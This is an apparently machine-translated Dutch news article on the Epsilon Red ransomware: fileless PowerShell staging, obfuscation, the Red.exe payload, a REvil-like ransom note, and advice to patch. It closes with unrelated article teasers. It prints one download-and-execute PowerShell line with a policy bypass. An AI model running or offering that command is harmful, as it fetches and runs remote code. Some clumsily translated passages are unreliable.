Heeft u uw servers al gepatcht ?
Een nieuwe ransomware- dreiging , genaamd Epsilon Red, richt zich op niet-gepatchte Microsoft-gebaseerde servers in bedrijfsdatacenters. Vernoemd naar een weinig bekende slechterik uit Marvel-strips, werd Epsilon Red onlangs ontdekt door een cyberbeveiligingsbedrijf genaamd Sophos. Sinds de ontdekking ervan heeft ransomware veel organisaties over de hele wereld aangevallen.
Bestandsloze ransomware "verbergt" zich in PowerShell
Fileless ransomware is een vorm van malware die wordt uitgevoerd door legitieme software te bundelen. Op PowerShell gebaseerde bestandsloze malware maakt gebruik van de mogelijkheid van PowerShell om rechtstreeks in het geheugen van het apparaat te laden. Deze functie helpt malware in PowerShell-scripts te beschermen tegen detectie.
In een typisch scenario moet een script, wanneer het wordt uitgevoerd, eerst naar de schijf van het apparaat worden geschreven. Hierdoor kunnen eindpuntbeveiligingsoplossingen scripts detecteren. Omdat PowerShell is uitgesloten van standaard scriptuitvoeringsprocessen, kan het de eindpuntbeveiliging omzeilen. Bovendien kan een aanvaller met behulp van de bypass- parameter in een PowerShell-script netwerkscriptbeperkingen omzeilen.
Een voorbeeld van een PowerShell-bypassparameter is:
powershell.exe -ep Bypass -nop -noexit -c iex ((New Object.WebClient).DownloadString(‘url’))Zoals u kunt zien, is het ontwerpen van PowerShell-bypassparameters relatief eenvoudig.
Als reactie hierop heeft Microsoft een patch uitgebracht om een kwetsbaarheid voor het op afstand uitvoeren van malware gerelateerd aan PowerShell aan te pakken. Patches zijn echter slechts zo effectief als ze worden gebruikt. Veel organisaties hebben de patchnormen versoepeld, waardoor hun omgevingen kwetsbaar zijn voor aanvallen. Het ontwerp van Epsilon Red is om te profiteren van dat niveau van kwetsbaarheid.
Het dubbele nut van Epsilon Red
Omdat Epsilon Red het meest effectief is tegen niet-gepatchte Microsoft-servers, kan de malware worden gebruikt als ransomware en identificatietool. Of Epsilon al dan niet succesvol is in een omgeving, geeft aanvallers meer inzicht in de beveiligingsmogelijkheden van hun doelwit.
Als Epsilon erin slaagt toegang te krijgen tot Microsoft Exchange Server, geeft dit aan dat de organisatie de gebruikelijke best practices op het gebied van patchbeveiliging niet volgt. Voor de aanvaller laat dit zien hoe gemakkelijk de rest van de omgeving van het doelwit door Epsilon kan worden aangetast.
Epsilon Red gebruikt Obfuscation om zijn lading te verbergen. Verduistering maakt code onleesbaar en wordt gebruikt in PowerShell-malware om een hoge leesbaarheid van PowerShell-scripts te voorkomen. Met verduistering worden PowerShell-alias- cmdlets gebruikt om het voor antivirussoftware moeilijk te maken om kwaadaardige scripts in PowerShell-logboeken te identificeren.
Epsilon Red is het meest effectief tegen niet-gepatchte Microsoft-servers
Verhulde PowerShell-scripts kunnen echter nog steeds worden geïdentificeerd. Een veelvoorkomend teken van een dreigende PowerShell Script-aanval is het maken van een WebClient-object. Een aanvaller maakt een WebClient-object in PowerShell-code om een externe verbinding tot stand te brengen met een externe URL die kwaadaardige code bevat.
Als een organisatie wordt aangevallen, is de kans zeer klein dat zij over voldoende beveiligingsmaatregelen beschikt om versluierde PowerShell-scripts te detecteren. Omgekeerd, als Epsilon Red er niet in slaagt de server binnen te dringen, zal dit voor de aanvaller een indicatie zijn dat het netwerk van het doelwit PowerShell-malware snel kan ontsleutelen, waardoor de aanval minder waardevol en waardevoller wordt.
Epsilon Red cyberinbraak
De functionaliteit van Epsilon Red is heel eenvoudig. De software gebruikt een reeks Powershell-scripts om servers te infiltreren. Deze PowerShell-scripts zijn genummerd van 1.ps1 tot 12.ps1. Het ontwerp van elk PowerShell-script is om een doelserver voor te bereiden op de uiteindelijke payload.
Alle PowerShell-scripts in Epsilon Red hebben hun eigen doel. Een van de PowerShell-scripts in Epsilon Red is ontworpen om de netwerkfirewallregels van het doel op te lossen. Nog een software in deze serie die is ontworpen om de antivirussoftware van het doelwit te verwijderen.
Zoals je misschien wel vermoedt, werken deze scripts synchroon om ervoor te zorgen dat zodra de lading is afgeleverd, het doel de voortgang niet snel kan stoppen.
Verzend lading
Zodra de PowerShell-scripts van Epsilon plaats hebben gemaakt voor de uiteindelijke payload, wordt deze gedistribueerd als een extensie, Red.exe . Wanneer Red.exe de server binnenkomt, scant het de bestanden van de server en maakt het een lijst met mappaden voor elk bestand dat het detecteert. Nadat de lijst is gemaakt, worden voor elk mappad in de lijst onderliggende processen gemaakt op basis van het hoofdmalwarebestand. Vervolgens codeert elk ransomware-subbestand een mappad uit het lijstbestand.
Nadat alle mappaden in de lijst van Epson zijn gecodeerd, blijft er een .txt-bestand achter om het doelwit te informeren en het verzoek van de aanvaller te vermelden. Bovendien zullen alle toegankelijke netwerkknooppunten die met de gecompromitteerde server zijn verbonden, worden aangetast en kan de kans groter zijn dat malware het netwerk binnendringt.
Wie zit er achter Epsilon Red?
De identiteit van de aanvallers achter Epsilon Red is nog onbekend
De identiteit van de aanvallers achter Epsilon Red is nog onbekend. Sommige aanwijzingen wijzen echter op de oorsprong van de aanvallers. De eerste aanwijzing is de naam van de malware. Epsilon Red is een X-Men-schurk met een Russisch oorsprongsverhaal.
De tweede aanwijzing ligt in het losgeldbriefje van het .txt-bestand dat de code achterliet. Het lijkt op het briefje dat is achtergelaten door een ransomwarebende genaamd REvil. Deze gelijkenis wijst er echter niet op dat de aanvallers lid waren van deze bende. REvil voert een RaaS-operatie (Ransomware as a Service) uit waarbij partners REvil betalen voor toegang tot zijn malware.
Bescherm uzelf tegen Epsilon Red
Tot nu toe is Epsilon Red met succes doorgedrongen tot ongepatchte servers. Dit betekent dat een van de beste beschermingsmaatregelen tegen Epsilon Red en soortgelijke ransomware-malware is ervoor te zorgen dat uw omgeving goed wordt beheerd. Bovendien zou het hebben van een beveiligingsoplossing die PowerShell-scripts snel kan ontsleutelen een nuttige toevoeging aan uw omgeving zijn.
Ziet u een activeringsmelding voor Windows 10 in de rechterhoek van het scherm? In dit artikel wordt uitgelegd hoe u de kennisgeving van een auteursrechtverzoek op Windows 10 verwijdert.
Onlangs heeft Microsoft de nieuwste cumulatieve update voor Windows 10 pc-gebruikers uitgebracht, genaamd Build 14393.222. Deze update voor Windows 10 repareert voornamelijk bugs op basis van gebruikersfeedback en verbetert de prestatie-ervaring van het besturingssysteem.
Heeft u computers op uw lokale netwerk die externe toegang nodig hebben? Het gebruik van een bastionhost als poortwachter voor uw netwerk kan een goede oplossing zijn.
Soms moet u oude gebeurtenislogboeken in één keer verwijderen. In deze handleiding laat Quantrimang.com u 3 manieren zien om snel alle gebeurtenislogboeken in Windows 10 Event Viewer te verwijderen.
Als je liever een oud klassiek toetsenbord gebruikt, zoals het IBM Model M, dat geen fysieke Windows-sleutel bevat, kun je er eenvoudig meer toevoegen door een sleutel te lenen die je niet vaak gebruikt.
WindowTop is een tool waarmee u alle toepassingsvensters en programma's op computers met Windows 10 kunt dimmen. Of u kunt een donkere achtergrondinterface op Windows gebruiken.
In veel eerdere artikelen hebben we vermeld dat online anoniem blijven uiterst belangrijk is. Elk jaar lekt privé-informatie uit, waardoor online beveiliging steeds noodzakelijker wordt. Dat is ook de reden dat we virtuele IP-adressen moeten gebruiken. Hieronder zullen we leren over methoden om nep-IP's te maken!
De Taalbalk op Windows 8 is een miniatuurtaalwerkbalk die is ontworpen om automatisch op het bureaublad te worden weergegeven. Veel mensen willen deze taalbalk echter op de taakbalk verbergen.
Het maximaliseren van de internetsnelheid is essentieel voor het optimaliseren van uw netwerkverbinding. U kunt een optimale entertainment- en werkervaring hebben met behulp van computers, internet-tv's, gameconsoles, enz.
Draadloze connectiviteit is tegenwoordig een noodzaak en daarom is draadloze beveiliging essentieel om de veiligheid in uw interne netwerk te garanderen.
